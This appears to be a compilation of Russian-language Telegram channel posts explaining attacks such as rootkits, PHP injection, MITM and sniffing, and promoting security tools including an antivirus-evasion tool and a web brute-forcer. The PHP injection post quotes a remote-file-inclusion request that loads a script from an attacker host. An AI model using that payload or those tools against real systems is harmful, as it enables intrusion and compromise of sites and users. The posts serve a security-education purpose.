💻 Руткит: что такое и чем он опасен

Руткит (англ. rootkit, то есть «набор root-а») — набор программных средств (исполняемых файлов, скриптов, конфигурационных файлов), обеспечивающих:

— маскировку объектов (процессов, файлов, каталогов, драйверов);
— управление (событиями, происходящими в системе);
— сбор данных (параметров системы).

Термин Rootkit исторически пришёл из мира UNIX, и под этим термином понимается набор утилит или специальный модуль ядра, которые хакер устанавливает на взломанной им компьютерной системе сразу после получения прав суперпользователя. Этот набор, включает в себя разнообразные утилиты для «заметания следов» вторжения в систему, делает незаметными снифферы, сканеры, кейлоггеры, троянские программы, замещающие основные утилиты UNIX.

❗️ В систему руткит может быть установлен различными способами: загрузка посредством эксплойта, после получения шелл-доступа (в таком случае, может использоваться средство типа wget или исходный FTP-клиент для загрузки руткита с удаленного устройства), в исходном коде или ресурсах программного продукта.

#rootkit

🥷 DNS spoofing: Введение

DNS-спуфинг, также известный как отравление кэша DNS, является одной из форм взлома компьютерных сетей, в котором данные кэша доменных имен изменяются злоумышленником, с целью возврата ложного IP-адреса.

В статье вы узнаете, о том, что такое DNS-атаки, как они работают и как с ними бороться.

🗄 Ссылка на telegra.ph

#DNS #spoofing

💉 PHP-инъекция: Введение

PHP-инъекция — один из способов взлома веб-сайтов, работающих на PHP. Он заключается в том, чтобы внедрить специально сформированный сценарий в код веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд.

— Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями.

Крэкеры анализируют такие уязвимости как неэкранированные переменные, получающие внешние значения. Например, старая уязвимость форума ExBB использовалась запросом:

GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

#PHP #Injection

📚 Книга: Black Hat Go. Программирование для хакеров и пентестеров

— Вы начнете с базового обзора синтаксиса языка и стоящей за ним философии, после чего перейдете к изучению примеров, которые пригодятся для разработки инструментов.

Вас ждет знакомство с протоколами HTTP, DNS и SMB. Далее вы перейдете к изучению различных тактик и задач, с которыми сталкиваются пентестеры, рассмотрите такие темы, как кража данных, сниффинг сетевых пакетов и разработка эксплойтов.

Вы научитесь создавать динамические встраиваемые инструменты, после чего перейдете к изучению криптографии, атаке на Windows и стеганографии.

⏺ Ссылка на книгу

#blackhat #books

🚠 MITM — что за атака и чем она опасна

Атака посредника, или атака «человек посередине» — вид атаки в криптографии и компьютерной безопасности, когда хакер тайно ретранслирует и при необходимости изменяет связь между двумя сторонами, которые считают, что они непосредственно общаются друг с другом.

— Является методом компрометации канала связи, при котором взломщик, подключившись к каналу между контрагентами, осуществляет вмешательство в протокол передачи, удаляя или искажая информацию.

Одним из примеров атак типа «человек посередине» является активное прослушивание, при котором хакер устанавливает независимые связи с жертвами и передаёт сообщения между ними.

❗️В большинстве случаев это довольно просто, например, хакер может вести себя как «человек посередине» в пределах диапазона приёма беспроводной точки доступа (Wi-Fi).

#MiTM #WiFi

🔎 PCAPdroid — сетевой трафик устройства

PCAPdroid - это приложение Android с открытым исходным кодом, которое позволяет отслеживать и экспортировать сетевой трафик вашего устройства.

— Приложение имитирует VPN для захвата без полномочий root, но, в отличие от VPN, трафик обрабатывается локально на устройстве.

⏺ Ссылка на GitHub

#android #traffic

🥷 Сниффинг пакетов: что такое и чем опасны

Сниффинг пакетов - довольно распространённый вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей Wi-Fi. В таком режиме все пакеты, полученные сетевой картой, пересылаются на обработку специальному приложению, называемому сниффером.

— В результате хакер может получить большое количество служебной информации: кто, откуда и куда передавал пакеты, через какие адреса эти пакеты проходили.

Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

#sniffing

🔎 Raspirus — сканер вредоносов

Raspirus - это легкий сканер вредоносных программ на основе сигнатур.

Обычные пользователи могут загрузить исполняемый файл для своей операционной системы с веб-сайта или страницы выпуска GitHub. Разработчики могут найти подробные руководства по донастройке Raspirus в документации.

⏺ Ссылка на GitHub
⏺ Ссылка на оф. сайт

#scan

✔️ Введение: Базовый анализ вирусов

В этом материале покажем, как перехватить трафик вредоноса, и проанализировать его код, также изучим реверс-инжиниринг.

⏺ Ссылка на telegra.ph

#Vulnerability

💽 SMS Forwarder — ретранслятор сообщений

SMS Forwarder - отслеживает SMS-сообщения мобильного телефона Android, входящие вызовы, уведомления приложений и переадресовывает их на другие устройства через Telegram, WeChat, SMS, вебхук, e-mail, PushPlus и множество других сервисов по вашему выбору.

⏺ Ссылка на инструмент

#spy

👨‍🔬 Загрузочный вирус: что такое и чем он опасен?

Загру́зочный ви́рус — компьютерный вирус, записывающийся в первый сектор гибкого или жёсткого диска и выполняющийся при загрузке компьютера с идущих после главной загрузочной записи (MBR), но до первого загрузочного сектора раздела. Перехватив обращения к дискам, вирус либо продолжает загрузку операционной системы, либо нет (MBR-Locker). Размножается вирус записью в загрузочную область других накопителей компьютера.

❗️ Простейшие загрузочные вирусы, находясь в памяти заражённого компьютера, обнаруживают в компьютере незаражённый диск и производят следующие действия:

— Выделяют некоторую область диска и делают её недоступной для операционной системы.
— Замещают программу начальной загрузки в загрузочном секторе диска, копируя корректную программу загрузки, а также свой код, в выделенную область диска;
— Организуют передачу управления так, чтобы вначале выполнялся код вируса и лишь затем — программа начальной загрузки.

Загрузочные вирусы были широко распространены в эпоху MS-DOS.

Вирус Brain — первый в истории компьютерный вирус, вызвавший широкую эпидемию, относился именно к классу загрузочных. Во второй половине 1990-х годов в связи с повсеместным использованием 32-разрядных версий Windows загрузочные вирусы временно потеряли свою актуальность.

Однако в 2007 г. появилась новая разновидность вредоносных программ — руткиты, использующие те же технологии заражения дисков, что и загрузочные вирусы.(click: пост о руткитах)

#virus #vulnerability

OSINT: socialscan

socialscan - инструмент командной строки, для быстрой проверки использования адреса электронной почты и имени пользователя на различных онлайн-платформах.

⏺ Ссылка на GitHub

#Recon #Tools

📶 BlockchainBay — распространение торрентов

BlockchainBay - это инструмент для распространения торрентов , размещенный на блокчейне, совместимом с EVM.

Данная утилита схожа с проектом Pirate Bay, но использует в качестве базы данных EVM-совместимый блокчейн (Ethereum, Polygon, BSC).

⏺ Ссылка на GitHub

— Выше прикрепили видеодемонстрацию данного инструмента.

#Torrent #EVM #Crypto

🥷 Атака на информационную систему: как реализуются и их классификация

Атака на информационную систему — это совокупность преднамеренных действий хакера, направленных на нарушение одного из трех свойств информации — доступности, целостности или конфиденциальности.

Выделяют три этапа реализации атак:
1. Этап подготовки и сбора информации об объекте атаки.
2. Этап реализации атаки.
3. Этап устранения следов и информации об атаковавшем.

— Классификация атак на информационную систему может быть выполнена по нескольким признакам:

По месту возникновения:
1. Локальные атаки (источником данного вида атак являются пользователи и/или программы локальной системы);
2. Удалённые атаки (источником атаки выступают удалённые пользователи, сервисы или приложения).

По воздействию на информационную систему:
1. Активные атаки (результатом воздействия которых является нарушение деятельности информационной системы);
2. Пассивные атаки (ориентированные на получение информации из системы, не нарушая функционирование информационной системы).

#attack

🛡 DroidFS — файловый проводник

DroidFS - это альтернативный способ использования зашифрованных файловых систем для Android.

— DroidFS использует собственный внутренний файловый проводник вместо монтирования виртуальных томов, с возможностью расшифровки и взаимодействия файлов с другими приложениями, но только с явного согласия пользователя и только через DroidFS.

⏺ Ссылка на F-droid

#Android #manager

🔎 Перехват сеанса UDP

Перехват UDP - это атака, при которой злоумышленник обманом заставляет жертву использовать свой компьютер как часть ботнета, обычно отправляя им незапрашиваемые запросы, замаскированные под поступающие из законных источников.

В этой статье рассмотрим метод перехвата сеанса путем манипулирования трафиком протокола.

⏺ Ссылка на telegra.ph

#UDP

⚫️ MsfMania — обход антивирусов

MsfMania - это инструмент командной строки, разработанный на Python, который предназначен для обхода антивирусного программного обеспечения в Windows и систем проверки VirusTotal.

⏺ Ссылка на GitHub

#bypass

💻 Web Brutator — автоматический брутфорс

Инструмент Web-brutator может автоматически обнаруживать стандартные формы веб-аутентификации и автоматически выполнять брутфорс.

⏺ Ссылка на GitHub

#Web #bruteforce

🖥 2 полезных канала для тех, кто увлечён ИБ, разведкой и сетями:

🤖 stein: ИБ, OSINT — канал от известного в узких кругах исследователя, в котором множество обучающих материалов по ИБ и кибер-разведке, полезных инструментов и личный взгляд автора.

👨‍🔬 Сетевик Джонни // Network Admin — канал сетевого инженера, который рассказывает про создание и настройку внутренних компьютерных сетей в доступной форме.

🔎 Smap — сканер портов

Smap - это копия Nmap, которая использует бесплатный API shodan.io для сканирования портов. Он принимает те же аргументы командной строки, что и Nmap, и производит тот же вывод.

Особенности:
• Сканирует 200 хостов в секунду
• Включает обнаружение уязвимостей
• Поддерживает все форматы вывода nmap
• Учетная запись shodan не требуется
• Полностью пассивный, всего 1 http запрос на хост
• и др…

⏺ Ссылка на GitHub

#Recon